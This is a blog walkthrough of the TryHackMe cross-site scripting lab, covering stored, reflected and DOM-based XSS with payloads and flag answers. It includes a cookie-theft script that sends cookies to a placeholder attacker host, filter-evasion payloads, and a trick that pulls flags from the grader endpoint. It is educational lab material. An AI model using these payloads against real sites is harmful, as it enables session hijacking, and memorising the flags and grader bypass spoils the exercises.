[Task 1] Introduction
Cross-site scripting (XSS) is a security vulnerability typically found in web applications. It's a type of injection which can allow an attacker to inject malicious scripts and have them execute on a victim's machine.
A web application is vulnerable to XSS if it uses unsanitised user input. XSS is possible in JavaScript, VBScript, Flash and CSS.
TryHackMe Cross Site Scripting - A Walkthrough by Kumar Atul Jaiswal
The severity of this vulnerability depends on the type of XSS, which is normally split into two categories: persistent/stored and reflected. Depending on the type, the following attacks are possible:
- Cookie Stealing - Stealing your cookie from an authenticated session, allowing an attacker to log in as you without having to provide credentials themselves.
- Keylogging - An attacker can register a keyboard event listener and send all of your keystrokes to their own server.
- Webcam snapshot - Using HTML5 capabilities, it's possible to even take snapshots from a compromised computer's webcam.
- Phishing - An attacker could either insert fake login forms into the page, or have you redirected to a clone of a site, tricking you into revealing your sensitive data.
- Port Scanning - You read that correctly. Stored XSS can be used to scan an internal network and identify other hosts on it.
- Other browser-based exploits - There are millions of possibilities with XSS.
Who knew all this was possible just by visiting a web page? Your browser and anti-virus have measures in place to prevent this from happening.
This room will explain the different types of cross-site scripting attacks and require you to solve challenges along the way.
This room is for educational purposes only; carrying out the attacks explained in this room without permission from the target is illegal. I take no responsibility for your actions. You need to learn how an attacker can exploit this vulnerability in order to ensure you're patching it properly.
[Task 2] Deploy your XSS Playground
Attached to this task is a machine used for all questions in this room. Every task in this room has a page on the XSS Playground site, which includes a more in-depth explanation of the vulnerability in question and supporting challenges.
[Task 3] Stored XSS
Stored cross-site scripting is the most dangerous type of XSS. This is where a malicious string originates from the website's database. This often happens when a website allows user input that is not sanitised (sanitising means removing the "bad parts" of a user's input) to be inserted into the database.
An example
The payload could be as simple as <script>alert(1)</script>
However, this payload won't just execute in your browser, but in any other browser that displays the malicious data inserted into the database.
Let's experiment with exploiting this type of XSS. Navigate to the "Stored-XSS" page on the XSS playground.
#1 The machine you deployed earlier will guide you through exploiting some of the cool vulnerabilities stored XSS has to offer. There are hints for answering these questions on the machine.
Doing so will reveal the answer to this question.
Payload :- <p>HEY, it's HTML!!</p>
Ans :- HTML_T4gs
#3 Create an alert popup box on the page with your document cookies.
Payload :- <script>alert(document.cookie)</script>
Ans :- W3LL_D0N3_LVL2
#4 Change "XSS Playground" to "I am a hacker" by adding comments and using Javascript.
Payload :- <script>document.getElementById('thm-title').innerHTML="I am a hacker"</script>
Ans :- websites_can_be_easily_defaced_with_xss
<script>window.location='http://attacker/?cookie='+document.cookie</script>
This script navigates the user's browser to a different URL; the new request includes the victim's cookie as a query parameter. Once the attacker has acquired the cookie, they can use it to impersonate the victim.
Take over Jack's account by stealing his cookie, what was his cookie value?
Payload :- <img src="javascript:'/log/' + document.cookie" />
Ans :- s%3Aat0YYHmITnfNSF0kM5Ne-ir1skTX3aEU.yj1%2FXoaxe7cCjUYmfgQpW3o5wP3O8Ae7YNHnHPJIasE
#6 Post a comment as Jack.
Ans :- c00ki3_stealing
[Task 4] Reflected XSS
In a reflected cross-site scripting attack, the malicious payload is part of the victim's request to the website. The website includes this payload in its response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
This might seem harmless, as it requires the victim to send a request containing the attacker's payload, and a user wouldn't attack themselves. However, an attacker can trick the user into clicking a crafted link that contains the payload, for example by social-engineering them via email.
Reflected XSS is the most common type of XSS attack.
An example
The website then includes this malicious payload from the request in its response to the user. The victim's browser executes the payload inside the response. The data the script gathers is then sent back to the attacker (it might not be sent directly from the victim to the attacker, but to another website where the attacker later collects it; this protects the attacker from directly receiving the victim's data).
#1 Craft a reflected XSS payload that will cause a popup saying "Hello"
Payload :- <script>alert("Hello")</script>
Ans :- ThereIsMoreToXSSThanYouThink
Payload :- <script>alert(window.location.hostname)</script>
Ans :- ReflectiveXss4TheWin
[Task 5] DOM-Based XSS
What is the DOM
In a DOM-based XSS attack, a malicious payload is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. So what does this mean?
With reflected XSS, an attacker's payload is injected directly into the website's response, and it does not matter when other JavaScript on the site gets loaded:
<html>
You searched for <em><script>...</script></em>
</html>
With DOM-based XSS, an attacker's payload is only executed when the vulnerable JavaScript code is loaded or interacted with. The payload passes through a JavaScript function like so:
var keyword = document.querySelector('#search')
keyword.innerHTML = '<script>...</script>'   // untrusted string written into an HTML sink: parsed as markup, not as text
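As an added defender-side example (not code from the TryHackMe room or from this walkthrough), the following JavaScript shows the fix that both the stored-XSS section and the DOM-based snippet above point at: encode untrusted data on output, and write it into the DOM with textContent instead of innerHTML. The payloads are the ones quoted on this page; the function names and the stand-in element object are assumptions made for this example.

```javascript
// Added example, not the room's code. Output encoding for stored/reflected output
// and the safe alternative to the innerHTML sink shown in the DOM-XSS section.
// PAYLOADS are the strings quoted elsewhere on this page.
const PAYLOADS = [
  "<script>alert(1)</script>",
  "<script>alert(document.cookie)</script>",
  'xxx" onmouseover="alert(document.cookie)',
  '<img src="blah" ONERROR="alert(\'HHelloello\')" />',
];

// Encode the five characters that let untrusted text break out of an HTML text
// node or a double-quoted attribute. Apply this whenever untrusted data is written
// into a response, whether it came from the request (reflected) or the database
// (stored). Encoding on output is unaffected by case tricks such as ONERROR,
// which defeat keyword-based filters.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Server-side rendering of the reflected example from this page, done safely.
const PREFIX = "<html>You searched for <em>";
const SUFFIX = "</em></html>";
function renderSearchResult(keyword) {
  return PREFIX + escapeHtml(keyword) + SUFFIX;
}

// Safe DOM sink: textContent stores the string as text and never parses it as
// HTML, so the page's DOM-based payloads are displayed rather than executed.
function setSearchText(element, keyword) {
  element.textContent = keyword;
  return element.textContent;
}

// Constructed stand-in for document.querySelector('#search') so this runs under Node.
function fakeSearchElement() {
  return { textContent: "", innerHTML: "" };
}

// True when the user-controlled part of the rendered page still holds a raw
// delimiter that could close a text node or an attribute value.
function hasRawDelimiters(html) {
  const inner = html.slice(PREFIX.length, html.length - SUFFIX.length);
  return /[<>"']/.test(inner);
}

// Every quoted payload comes out of renderSearchResult() as inert text.
function allPayloadsNeutralised() {
  return PAYLOADS.every((p) => !hasRawDelimiters(renderSearchResult(p)));
}
```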
#1 Look at the deployed machine's DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
The hint gives us something to try out.
test" onmouseover="alert('Hover over the image and inspect the image element')
What this does is put test into the src attribute of the image tag and close that quote, then start an onmouseover event attribute. When we do this and hover over the broken image, we see the alert.
Let's modify it and make it do what the task is asking for (document.cookie instead of that string):
xxx" onmouseover="alert(document.cookie)
That should give us the desired result. We could have chosen a number of different events rather than onmouseover. I personally prefer onerror for this example. Give it a try!
Ans :- BreakingAnElementsTag
xxx" onhover="document.body.style.backgroundColor='red'
You might have to play around with this one, it's a bit buggy for me. I had to end up doing it with an onmouseover I think. Play around and you'll eventually get it.
[Task 6] Using XSS for IP and Port Scanning
Cross-site scripting can be used for all sorts of mischief, one being the ability to scan a victim's internal network and look for open ports. If an attacker is interested in what other devices are connected to the network, they can use JavaScript to make requests to a range of IP addresses and determine which ones respond.
On the XSS Playground, go to the IP/Port scanning tab and review a script to scan the internal network.
[Task 7] XSS Keylogger
JavaScript can be used for many things, including registering an event listener for key presses.
Navigate to the "Key Logger" part of the XSS playground and complete the challenge.
[Task 8] Filter Evasion
There are many techniques used to filter malicious payloads that are used with cross-site scripting. It will be your job to bypass 4 commonly used filters.
Navigate to "Filter Evasion" in the XSS Playground to get started.
Cross-site scripting vulnerabilities are extremely common. Below are a few reports of XSS found in massive applications; you can be paid very well for finding and reporting these vulnerabilities.
XSS found in Shopify
$7,500 for XSS found in Steam chat
$2,500 for XSS in HackerOne
XSS found in Instagram
#1 Bypass the filter that removes any script tags.
Payload :- <img src="blah" onerror=alert("Hello") />
Ans :- 3c3cf8d90aaece81710ab9db759352c0
Payload :- <img src="blah" onerror=confirm("Hello") />
Ans :- a2e5ef66f5ff584a01d734ef5edaae91
Payload :- <img src="blah" onerror=alert("HHelloello") />
Ans :- decba45d0eff17c6eedf1629393bee1d
Filter list: the word "Hello", script, onerror, onsubmit, onload, onmouseover, onfocus, onmouseout, onkeypress, onchange
<img src="blah" ONERROR="alert('HHelloello')" />
I'll let you in on a secret. This section is all being evaluated by POSTing values for question and answer to /filter-evasion-check. If you simply POST question=1&answer=Hello to /filter-evasion-check, you can fool the server-side code into returning the valid answer flag.
POST question=1&answer=Hello
POST question=2&answer=prompt
POST question=4&answer=Hello
[Task 9] Protection Methods & Other Exploits
Protection Methods
Disclaimer
This was written for educational purposes and pentesting only.
The author will not be responsible for any damage!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal!
All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials are against the misuse of this information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.
All tutorials and videos have been made using our own routers, servers, websites and other resources; they do not contain any illegal activity. We do not promote, encourage, support or incite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from becoming a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.
I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)